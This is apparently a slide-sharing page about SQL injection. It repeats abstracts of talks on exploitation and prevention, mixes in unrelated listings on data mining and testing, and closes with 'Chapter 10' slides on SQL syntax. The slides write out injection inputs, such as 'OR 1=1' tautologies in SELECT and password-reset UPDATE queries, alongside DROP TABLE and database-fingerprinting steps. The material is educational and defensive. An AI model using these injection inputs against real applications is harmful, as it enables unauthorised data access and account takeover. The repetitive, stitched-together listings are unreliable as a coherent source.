The document provides an overview of structured query language (SQL) and SQL injection. It discusses SQL queries including SELECT, INSERT, UPDATE, DELETE statements. It also covers identifying the database platform, combining rows, SQL injection cheat sheets, bypassing input validation filters, and troubleshooting SQL injection attacks on various platforms including PostgreSQL, DB2, Informix and Ingres.
Show the reader the potential damage that a SQL injection vulnerability can make. Show evading techniques to some filters. Show some common mistakes that the programmers make when protecting their sites. Show the best practices to protect your code.
Advanced Topics On Sql Injection Protectionamiable_indian
The document discusses various methods for preventing SQL injection attacks, including input validation, using static query statements, and least privilege approaches. It provides detailed explanations and examples of how to properly implement input validation, including escaping special characters, validating numeric fields, and preventing second-order SQL injection. The document also cautions that approaches like parameterized statements and stored procedures do not automatically prevent SQL injection and can still be vulnerable if not implemented correctly.
The document discusses various techniques for exploiting SQL injection vulnerabilities, including classical and blind SQL injection. It provides examples of exploiting SQL injection on different database management systems like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. It also discusses methods for bypassing web application firewalls during SQL injection attacks.
The document discusses SQL injection vulnerabilities. It begins by explaining what SQL is and how it is used to interact with databases. It then discusses how SQL injection works by exploiting vulnerabilities in web applications that construct SQL queries using external input. The document provides an overview of methodology for testing for and exploiting SQL injection vulnerabilities, including input validation, information gathering, exploiting true conditions, interacting with the operating system, using the command prompt, and escalating privileges.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Show the reader the potential damage that a SQL injection vulnerability can make. Show evading techniques to some filters. Show some common mistakes that the programmers make when protecting their sites. Show the best practices to protect your code.
Advanced Topics On Sql Injection Protectionamiable_indian
The document discusses various methods for preventing SQL injection attacks, including input validation, using static query statements, and least privilege approaches. It provides detailed explanations and examples of how to properly implement input validation, including escaping special characters, validating numeric fields, and preventing second-order SQL injection. The document also cautions that approaches like parameterized statements and stored procedures do not automatically prevent SQL injection and can still be vulnerable if not implemented correctly.
The document discusses various techniques for exploiting SQL injection vulnerabilities, including classical and blind SQL injection. It provides examples of exploiting SQL injection on different database management systems like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. It also discusses methods for bypassing web application firewalls during SQL injection attacks.
The document discusses SQL injection vulnerabilities. It begins by explaining what SQL is and how it is used to interact with databases. It then discusses how SQL injection works by exploiting vulnerabilities in web applications that construct SQL queries using external input. The document provides an overview of methodology for testing for and exploiting SQL injection vulnerabilities, including input validation, information gathering, exploiting true conditions, interacting with the operating system, using the command prompt, and escalating privileges.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
Learn what is SQL injection, how to use prepared statements, how to escape and write secure stored procedures. Many PHP projects are covered - PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
This document discusses SQL injection and ways to prevent it. SQL injection occurs when malicious SQL statements are inserted into an insufficiently validated string that is later executed as a database command. It can allow attackers to read or modify data in the database. The document outlines different types of SQL injection attacks and provides examples of how input validation and prepared statements can prevent injection. It also discusses command injection and file path traversal attacks.
This document discusses SQL injection vulnerabilities and techniques for exploiting them. It covers:
1) What SQL injection is and how it works by exploiting vulnerabilities in web applications.
2) A methodology for testing for and exploiting SQL injection vulnerabilities, including information gathering, exploiting boolean logic, extracting data, and escalating privileges.
3) Specific techniques for each step like determining the database type, exploring the database structure, grabbing passwords, and creating new database accounts.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
SQL Injection in action with PHP and MySQLPradeep Kumar
A hands-on example for SQL injection using PHP and MySQL
It also offers an overview how it gets into in our applications and how we can overcome SQL Injection.
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
For more course tutorials visit
www.tutorialrank.com
CIS 336 Final Exam Guide
1)Joe works for a company where the IT department charges him for the number of CRM login accounts that are in his department. What type of IT funding model is his company deploying?
What is advanced SQL Injection? InfographicJW CyberNerd
This document discusses SQL injection and advanced SQL injection techniques. SQL injection allows attackers to pass SQL commands through a web application to exploit vulnerabilities and gain unauthorized access to databases. Advanced SQL injection goes further by compromising the underlying operating system and network. Attackers can use SQL injection to bypass authentication, disclose information, compromise data integrity and availability, execute remote code, enumerate databases and columns, conduct network reconnaissance, and more. The document encourages learning advanced SQL injection to exploit web applications and compromise security.
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
The sqlite3 command line tool allows users to interactively evaluate SQL queries and view results. It can be used to create and populate databases, view table schemas and data, and dump tables to SQL files. The tool supports meta commands for output formatting, running SQL scripts, and more. Configuration options are also available to set defaults via a resource file or command line flags.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr Director of Application Development at PBS
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
The document discusses various software testing techniques including black-box testing which focuses on inputs and outputs without seeing internal code, and white-box testing which considers internal logic and structures. Different levels of testing are covered from unit to acceptance testing. Strategies for effective test case design such as equivalence partitioning and boundary value analysis are also presented.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
Advanced SQL injection to operating system full control (slides)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at Black Hat Euroe conference in Amsterdam on April 16, 2009.
The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
This document discusses SQL injection and ways to prevent it. SQL injection occurs when malicious SQL statements are inserted into an insufficiently validated string that is later executed as a database command. It can allow attackers to read or modify data in the database. The document outlines different types of SQL injection attacks and provides examples of how input validation and prepared statements can prevent injection. It also discusses command injection and file path traversal attacks.
This document discusses SQL injection vulnerabilities and techniques for exploiting them. It covers:
1) What SQL injection is and how it works by exploiting vulnerabilities in web applications.
2) A methodology for testing for and exploiting SQL injection vulnerabilities, including information gathering, exploiting boolean logic, extracting data, and escalating privileges.
3) Specific techniques for each step like determining the database type, exploring the database structure, grabbing passwords, and creating new database accounts.
This document provides an agenda and overview for a talk on exploiting SQL injections from web applications against Oracle databases. The talk covers topics like PL/SQL vs SQL injection, extracting data, privilege escalation, OS code execution, second order attacks, and tools for exploitation like Bsqlbf. It discusses challenges like limitations of SQL in Oracle and lack of documentation. Examples are provided for various exploits like using DBMS_EXPORT_EXTENSION and DBMS_JAVA_TEST functions to escalate privileges or execute OS commands.
SQL Injection in action with PHP and MySQLPradeep Kumar
A hands-on example for SQL injection using PHP and MySQL
It also offers an overview how it gets into in our applications and how we can overcome SQL Injection.
This document discusses SQL injection attacks and how to mitigate them. It begins by explaining how injection attacks work by tricking applications into executing unintended commands. It then provides examples of how SQL injection can be used to conduct unauthorized access and data modification attacks. The document discusses techniques for finding and exploiting SQL injection vulnerabilities, including through the SELECT, INSERT, UPDATE and UNION commands. It also covers ways to mitigate injection attacks, such as using prepared statements with bound parameters instead of concatenating strings.
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I will then illustrate into details common and uncommon problems and respective solutions with examples that a penetration tester faces when he wants to take advantage of any kind of web application SQL injection flaw on real world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single entry UNION query SQL injection, specific web application technologies IDS bypasses and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection" and it is still considered one of the major web application threats, affecting over 70% of web application on the Net. A lot has been said on this specific vulnerability, but not all of the aspects and implications have been uncovered, yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
This document discusses SQL injection attacks and how to prevent them. It describes different types of SQL injection like blind SQL injection and union-based injection. It provides examples of vulnerable code and how attackers can exploit it. Finally, it recommends best practices for prevention, including using parameterized queries, stored procedures, input validation, and secure configuration.
For more course tutorials visit
www.tutorialrank.com
CIS 336 Final Exam Guide
1)Joe works for a company where the IT department charges him for the number of CRM login accounts that are in his department. What type of IT funding model is his company deploying?
What is advanced SQL Injection? InfographicJW CyberNerd
This document discusses SQL injection and advanced SQL injection techniques. SQL injection allows attackers to pass SQL commands through a web application to exploit vulnerabilities and gain unauthorized access to databases. Advanced SQL injection goes further by compromising the underlying operating system and network. Attackers can use SQL injection to bypass authentication, disclose information, compromise data integrity and availability, execute remote code, enumerate databases and columns, conduct network reconnaissance, and more. The document encourages learning advanced SQL injection to exploit web applications and compromise security.
SQL injection is a code injection technique that exploits vulnerabilities in database-driven web applications. It occurs when user input is not validated or sanitized for string literal escape characters that are part of SQL statements. This allows attackers to interfere with the queries and obtain unauthorized access to sensitive data or make changes to the database. The document then provides step-by-step instructions on how to scan for vulnerabilities, determine database details like name and tables, extract data like user credentials, bypass protections like magic quotes, and use tools to automate the process.
The sqlite3 command line tool allows users to interactively evaluate SQL queries and view results. It can be used to create and populate databases, view table schemas and data, and dump tables to SQL files. The tool supports meta commands for output formatting, running SQL scripts, and more. Configuration options are also available to set defaults via a resource file or command line flags.
An overview of techniques for defending against SQL Injection using Python tools. This slide deck was presented at the DC Python Meetup on October 4th, 2011 by Edgar Roman, Sr Director of Application Development at PBS
This document provides a tutorial on SQL injection, including:
- Explaining what SQL injection is and how it works by exploiting vulnerabilities in database queries
- Steps to test for SQL injection vulnerabilities like determining the database type and getting environment information
- Methods for extracting data through SQL injection like getting database, table, and column names and record data
- Recommending the use of automated SQL injection scanning tools like WebCruiser to more efficiently test for and exploit SQL injection vulnerabilities
- Instructions for setting up sample PHP/MySQL and ASP/SQL Server testing environments to practice SQL injection techniques
The document discusses various software testing techniques including black-box testing which focuses on inputs and outputs without seeing internal code, and white-box testing which considers internal logic and structures. Different levels of testing are covered from unit to acceptance testing. Strategies for effective test case design such as equivalence partitioning and boundary value analysis are also presented.
This document discusses data cubes, which are multidimensional data structures used in online analytical processing (OLAP) to enable fast retrieval of data organized by dimensions and measures. Data cubes can have 2-3 dimensions or more and contain measures like costs or units. Key concepts are slicing to select a 2D page, dicing to define a subcube, and rotating to change dimensional orientation. Data cubes represent categories through dimensions and levels, and store facts as measures in cells. They can be pre-computed fully, not at all, or partially to balance query speed and memory usage. Totals can also be stored to improve performance of aggregate queries.
This document provides an introduction and overview of the DBM630: Data Mining and Data Warehousing course. It outlines the course syllabus, textbooks, assessment tasks, schedule, prerequisites, and provides a high-level introduction to data mining and data warehousing concepts including definitions, processes, applications and evolution of database technologies.
The document discusses several case studies and applications of data mining including:
1) Customer attrition prediction helped a mobile phone company reduce attrition rates from over 2%/month to under 1.5%/month.
2) Credit risk models used by banks to predict loan defaults enabled proliferation of mortgages and credit cards.
3) Amazon's product recommendations were successful by clustering customers based on products purchased.
4) A case study of MetLife found $30 million in fraudulent insurance claims through data mining of a $50 million consolidated database within companies worldwide to detect fraud like rate evasion faster than manual methods.
This document discusses various classification and prediction techniques including Naive Bayes classification, regression, and support vector machines (SVM). It covers topics such as Naive Bayes assumptions, dealing with missing data, numeric attributes, and Bayesian belief networks. Statistical modeling approaches like Naive Bayes make independence assumptions between attributes. Regression can be used for numerical prediction problems.
This document discusses data mining concepts including data preprocessing and postprocessing. It covers the differences between data mining, machine learning, and statistics. Data mining aims to discover knowledge from data in an automatic or semi-automatic way. Both data mining and machine learning use techniques to generalize from data, but data mining focuses more on gaining knowledge rather than just prediction. Data preprocessing techniques like cleaning, integration, and transformation are used to engineer the input data. Data postprocessing techniques combine multiple models to engineer the output.
This document provides an overview of key concepts related to decision support systems (DSS) and data warehousing. It defines DSS as interactive computer systems that help decision makers use data, documents, models and communication technologies to identify and solve problems. It then discusses operational databases and how they differ from data warehouses in areas like data type, focus, users and more. Finally, it defines key characteristics of a data warehouse as being subject-oriented, integrated, time-variant and non-volatile to support management decision making.
This document provides an overview of classification and prediction evaluation techniques. It discusses evaluating models on large and small datasets using techniques like train/test splits, cross-validation, and the bootstrap method. Evaluation measures for binary classification like precision, recall, and accuracy are presented. Visualization techniques like lift charts and ROC curves for comparing model performance are also introduced.
A data warehouse is a subject-oriented, integrated, time-variant collection of data that supports management's decision-making processes. It contains data extracted from various operational databases and data sources. The data is cleaned, transformed, integrated and loaded into the data warehouse for analysis. A data warehouse uses a multidimensional model with facts and dimensions to allow for complex analytical and ad-hoc queries from multiple perspectives. It is separately administered from operational databases to avoid impacting transaction processing systems and allow optimized access for decision support.
The document provides an overview of data warehousing and OLAP technology. It defines a data warehouse as a subject-oriented, integrated collection of historical data used for analysis and decision making. It describes key properties of data warehouses including being subject-oriented, integrated, time-variant, and non-volatile. It also discusses dimensional modeling, data cubes, and OLAP for analyzing aggregated data.
This document provides a summary of lecture 5 on association rule mining. It discusses topics like association rule mining, mining single and multilevel association rules, measurements like support and confidence. It provides examples of mining association rules from transactional databases and relational tables. It describes the Apriori algorithm for mining frequent itemsets and generating association rules. It also discusses techniques like FP-tree for overcoming performance issues of Apriori.
This document provides an overview of clustering techniques. It discusses what clustering is, different types of attributes that can be clustered, and major clustering approaches. The major approaches covered are partitioning algorithms, which construct partitions and evaluate them; hierarchical algorithms, which create a hierarchical decomposition; and density-based algorithms, which are based on connectivity and density. Examples of applications are also provided.
The document discusses data mining and provides an overview of key concepts. It describes data mining as the process of discovering patterns in large data sets involving techniques like classification, clustering, association rule mining, and outlier detection. It also discusses different types of data that can be mined, including transactional data and text data. Additionally, it presents different classifications of data mining systems based on the type of data, knowledge discovered, and techniques used.
Apache kylin 2.0: from classic olap to real-time data warehouseYang Li
Apache Kylin, which started as a big data OLAP engine, is reaching its v2.0. Yang Li explains how, armed with snowflake schema support, a full SQL interface, spark cubing, and the ability to consume real-time streaming data, Apache Kylin is closing the gap to becoming a real-time data warehouse.
Talks about best practices and patterns on how to design an efficient cube in Kylin. Covers concepts like mandatory dimension, hierarchy dimension, derived dimension, incremental build, aggregation group etc.
The document discusses data warehouse implementation and online analytical processing (OLAP). It describes the compute cube operator, which computes aggregates for all subsets of specified dimensions. It also covers efficient cube computation techniques like chunking and materialized views. Better access methods for OLAP like bitmap indexing and join indexing are also summarized. The document emphasizes that efficient query processing requires determining which operations to perform on available cuboids and selecting the optimal cuboid based on factors like storage size and indexing.
Apache Kylin’s Performance Boost from Apache HBaseHBaseCon
Hongbin Ma and Luke Han (Kyligence)
Apache Kylin is an open source distributed analytics engine that provides a SQL interface and multi-dimensional analysis on Hadoop supporting extremely large datasets. In the forthcoming Kylin release, we optimized query performance by exploring the potentials of parallel storage on top of HBase. This talk explains how that work was done.
These are the slides from the defcon talk title 'The making of 2nd sql injection worm'. Refer to the video presentations uploaded on www.notsosecure.com.
SQL injection is a code injection technique that exploits security vulnerabilities in web applications by inserting malicious SQL statements into input fields. When user-supplied input is inserted into a SQL query without validation or sanitization, an attacker can manipulate the SQL statement and gain unauthorized access to sensitive data or make unauthorized changes by supplying specially crafted input containing SQL keywords and operators. Common defenses include sanitizing all user input, using parameterized queries instead of dynamic SQL, and running database access with least privileges.
SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.
This document provides an overview of new features in SQL Server 2005, including SQLCLR which allows writing functions, procedures and triggers in .NET languages. It discusses how to install and debug SQLCLR assemblies, and create user-defined data types and aggregates that can extend the functionality of SQL Server. Key enhancements to T-SQL are also summarized, such as common table expressions, ranking commands, and exception handling.
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
Oracle Database 12c includes over 500 new features designed to support cloud computing, big data, security, and availability. Key features include support for up to 4096 pluggable databases, hot cloning without placing the source database in read-only mode, sharding capabilities, in-memory column storage, application containers, improved resource management isolation, and AWR support on Active Data Guard databases. Other notable features include enhanced JSON support, data redaction for security, row limits and offsets for queries, invisible columns, SQL text expansion, PL/SQL from SQL, session-level sequences, extended data types up to 32K, multiple indexes on the same columns, READ privileges without row locking ability, session private statistics for global temporary tables,
Oracle Database 12c - New Features for Developers and DBAsAlex Zaballa
This document summarizes a presentation about new features in Oracle Database 12c for developers and DBAs. It introduces JSON support, data redaction, SQL query row limits and offsets, invisible columns, extended data types, session level sequences, and more. Demo sections are included to illustrate several of the new features.
This document discusses SQL injection attacks and how to mitigate them. It begins by defining injection attacks as tricks that cause an application to unintentionally include commands in user-submitted data. It then explains how SQL injection works by having the attacker submit malicious SQL code in a web form. The document outlines several examples of SQL injection attacks, such as unauthorized access, database modification, and denial of service. It discusses techniques for finding and exploiting SQL injection vulnerabilities. Finally, it recommends effective mitigation strategies like prepared statements and input whitelisting to protect against SQL injection attacks.
The document discusses SQL injection, which occurs when malicious SQL commands are injected into a backend database. It provides examples of how SQL injection can be used to bypass authentication or retrieve sensitive data from a database. The document then discusses various techniques for preventing SQL injection, including using stored procedures, parameterized queries, and object-relational mappers like Entity Framework and NHibernate which help protect against injection attacks.
The document discusses SQL injection in Oracle-based applications. It begins by defining SQL injection and explaining how it works by manipulating user-supplied data to alter SQL statements. It then provides examples of how SQL can be injected into Oracle to extract data, enumerate privileges, and abuse stored procedures. The document concludes by discussing ways to prevent SQL injection, such as avoiding dynamic SQL, using bind variables, and following the principle of least privilege.
By using specially crafted parameters in double quotes, it is possible to bypass the input validation of the Oracle dbms_assert package and inject SQL code. This allows dozens of already patched Oracle vulnerabilities to be exploited again across versions 8.1.7.4 to 10.2.0.2. The researcher notified Oracle of the problem in April 2006. To mitigate risks, privileges like CREATE PROCEDURE should be revoked to prevent injection of malicious functions or procedures.
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, I’ll cover common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. I’ll also share a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.
The document discusses SQL Server security attacks and defenses. It outlines how attackers can fingerprint servers, acquire user accounts through brute force or SQL injection, and escalate privileges. It then provides recommendations for securing SQL Server deployments through configuration hardening, input validation, patching, and access control best practices.
The document discusses SQL injection attacks. It explains that SQL injection works by tricking web applications into treating malicious user input as SQL code rather than data. This allows attackers to view sensitive data from the database or make changes by having the application execute unintended SQL commands. The key to preventing SQL injection is using prepared statements with bound parameters rather than concatenating user input into SQL queries. Other types of injection attacks on different interpreters are also discussed.
Advanced SQL - Database Access from Programming LanguagesS.Shayan Daneshvar
This document discusses various approaches for accessing databases from programming languages, including dynamic SQL, embedded SQL, standards like ODBC, JDBC, ADO/ADO.NET, and examples of using these standards. It covers connecting to databases, executing queries and stored procedures, handling results, and addressing issues like SQL injection. Other topics mentioned include database metadata, transactions, repository patterns, object-relational mapping tools, and database version control.
SQL injection is a common web application security vulnerability that allows attackers to control an application's database by tricking the application into sending unexpected SQL commands to the database. It works by submitting malicious SQL code as input, which gets executed by the database since the application concatenates user input directly into SQL queries. The key to preventing SQL injection is using prepared statements with bound parameters instead of building SQL queries through string concatenation. This separates the SQL statement from any user-supplied input that could contain malicious code.
The document provides an overview of SQL injection, including what SQL is, how SQL injection works by exploiting vulnerabilities in user input validation, and a methodology for testing for and exploiting SQL injection vulnerabilities. It covers topics like determining the database type, user privileges, and extracting information to expand the impact of SQL injection attacks.
This document provides an overview of SQL injection attacks and techniques for exploiting Microsoft SQL Server databases. It discusses the basics of SQL injection vulnerabilities and how they can be used to bypass authentication, evade audit logs, and search for vulnerable websites. The document then covers normal SQL injection attacks on MSSQL, including using HAVING/GROUP BY, CONVERT functions, and UNION queries. It also discusses blind SQL injection techniques, more advanced attacks using extended stored procedures, and SQL injection worm attacks. Countermeasures are suggested, and the document provides references and greetings.
SQL is a standard language for accessing and manipulating databases. It allows users to execute queries, retrieve data, and modify data by inserting, updating, or deleting records. SQL injection is a vulnerability that allows attackers to inject SQL commands into a database by exploiting insecure code. This can allow attackers to extract sensitive data like usernames and passwords or even take control of backend database servers and websites. Proper input validation and sanitization is needed to prevent SQL injection attacks.
4. Structured Query Language (SQL) SQL was originally developed at IBM in early 1970. Formalized until 1986 by American National Standards Institute (ANSI). We using the SQL standard defined by the International Organization for Standardization (ISO). 2/04/2011 CHAPTER 10 4
5. SQL Queries SQL queries are made up of one or more SQL statements that are effectively instructions for the database server to carry out. it may include a conditional clause to target specific rows in a table(WHERE). The OR and AND operators are used when multiple conditions are to be evaluated. SELECT Statement SELECT * FROM tblUsers ; SELECT * INTO hackerTable FROM tblusers UNION Operator SELECT username, password FROM tblUsers UNION SELECT username, password FROM tblAdmins; SELECT username, password FROM tblUsers UNION ALL SELECT username, password FROM tblAdmins 2/04/2011 CHAPTER 10 5
6. SQL Queries (CON..) INSERT Statement INSERT IN TO tblUsers VALUES (5,'john','smith',0); INSERT INTO tblUsers(id, username, password, priv) VALUES (5, 'john','smith',0); UPDATE Statement UPDATE tblUsers SET priv=0 WHERE username = 'sarah‘; DELETE Statement DELETE FROM tblUsers WHERE username = 'admin‘; 2/04/2011 CHAPTER 10 6
7. SQL Queries (CON..) Notes from the Underground… SELECT story FROM news WHERE id=19; SELECT story FROM news WHERE id=19 OR 1=1 ; SELECT story FROM news WHERE id=19 OR 1=2 ; UPDATE tblUsers SET password='letmein' WHEREemailaddress='someuser@victim.com‘; UPDATE tblUsers SET password='letmein' WHERE emailaddress=‘ ’ or 1=1’ ; 2/04/2011 CHAPTER 10 7
8. SQL Queries (CON..) DROP Statement DROP TABLE tblusers; CREATE TABLE Statement CREATE TABLE shoppinglist(item int, name varchar(100)); CREATE TABLE shoppinglist as select * from dba_users; ORDER BY Clause SELECT cost, product FROM orders ORDER BY cost DESC; 2/04/2011 CHAPTER 10 8
9. SQL Queries (CON..) ALTER TABLE Statement ALTER TABLE tblUsers ADD comments varchar(100); ALTER TABLE tblUsers DROP COLUMN comments; ALTER TABLE tblUsers ALTER COLUMN comments varchar(500); GROUP BY Statement SELECT customer,SUM(cost) FROM orders WHERE customer = 'Anthony Anteater‘ GROUP BY customer; 2/04/2011 CHAPTER 10 9
12. SQL Injection Quick Reference most common SQL queries and techniques we will need when exploiting an SQL injection vulnerability identify the database platform. SQL injection cheat sheet 2/04/2011 12 CHAPTER 10
13. Identifying the Database Platform Web server platform and scripting language. IIS + ASP.NET => SQLServer . APACHE + PHP => MySQL . …. Etc. But we need more scientific approach …… 2/04/2011 13 CHAPTER 10
14. Identifying the Database Platform Time Delay Inference is a long-standing method of identifying the database platform. OR .. submitting “heavy queries” designed to consume the processor for a measureable length of time. 2/04/2011 14 CHAPTER 10
15.
